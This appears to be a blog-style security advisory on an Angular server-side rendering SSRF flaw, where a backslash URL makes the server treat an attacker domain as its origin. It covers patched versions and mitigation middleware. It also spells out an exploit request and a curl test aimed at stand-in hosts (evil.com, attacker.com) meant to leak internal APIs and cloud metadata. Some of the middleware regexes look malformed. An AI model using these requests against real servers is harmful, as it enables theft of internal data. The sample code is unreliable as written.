Listen to this Post
How the mentioned CVE works
The vulnerability resides in `@angular/platform-server` due to improper URL handling during Server-Side Rendering (SSR). When an attacker sends a crafted HTTP request like GET /\evil.com/ HTTP/1.1, the Express (or other Node.js server) passes the raw URL string to Angular’s rendering functions (e.g., renderModule). Angular’s URL parser normalizes backslashes to forward slashes for HTTP/HTTPS schemes. Consequently, the backslash sequence `/\evil.com/` is interpreted as `//evil.com/` after normalization. This causes the internal state to believe the current origin is `evil.com` instead of the legitimate server. The application then treats the attacker’s domain as the local origin. Any subsequent relative `HttpClient` requests or `PlatformLocation.hostname` references are redirected to the attacker-controlled server. This can expose internal APIs, metadata endpoints, or cloud instance metadata services. Affected APIs include renderModule, renderApplication, and `CommonEngine` from @angular/ssr. Non-affected APIs are `AngularAppEngine` and `AngularNodeAppEngine` (same package). Attack preconditions: outbound network access from the server, use of affected SSR APIs, passing `req.url` as the pathname to rendering methods, and server-side code that issues relative HTTP requests or uses `hostname` to build URLs. Patches are available in versions 22.0.0-next.8, 21.2.9, 20.3.19, and 19.2.21. A middleware workaround sanitizes leading slashes.
dailycve form
Platform: Angular SSR
Version: Before 19.2.21
Vulnerability: SSRF via backslash
Severity: High
date: Not specified
Prediction: Patches available
What Undercode Say:
Analytics:
Count vulnerable Angular versions in package-lock.json
grep -E '"@angular/platform-server": "(19.[0-2].|20.[0-2].|21.[0-1].|22.0.0-next.[0-7])"' package-lock.json | wc -l
Simulate malicious request to test SSRF
curl -v "http://localhost:4000/\\evil.com/api/internal"
Middleware to log suspicious URL patterns
app.use((req, res, next) => { if (req.url.match(/^[/\]{2,}/)) console.error('SSRF attempt:', req.url); next(); })
how Exploit:
- Identify an Angular SSR endpoint using affected APIs (
renderModule/renderApplication/CommonEngine).
2. Send `GET /\attacker.com/relative/path HTTP/1.1` to the server.
- The server normalizes `\` to
/, forming//attacker.com/relative/path.
4. Angular interprets `attacker.com` as the origin.
- Trigger a relative `HttpClient.get(‘/admin’)` or `PlatformLocation.hostname` – the request goes to
attacker.com/admin. - Attacker receives internal data (e.g., AWS metadata, internal API responses).
Protection from this CVE
- Upgrade to patched versions: 22.0.0-next.8, 21.2.9, 20.3.19, or 19.2.21.
- If upgrade impossible, add middleware to sanitize `req.url` before Angular sees it:
app.use((req, res, next) => { if (req.url.startsWith('//') || req.url.startsWith('/\') || req.url.startsWith('\')) { req.url = '/' + req.url.replace(/^[/\]+/, ''); } next(); }); - Disable outbound network access from the SSR server where not required.
- Avoid using `req.url` directly; validate and whitelist allowed pathnames.
Impact:
Successful exploitation allows an attacker to redirect internal HTTP requests made by the Angular SSR server to an external malicious domain. This can leak sensitive data from internal APIs, cloud metadata endpoints (e.g., `http://169.254.169.254/latest/meta-data/`), or any service reachable from the server. The attacker may also probe internal network topology and access non-public endpoints, leading to further compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

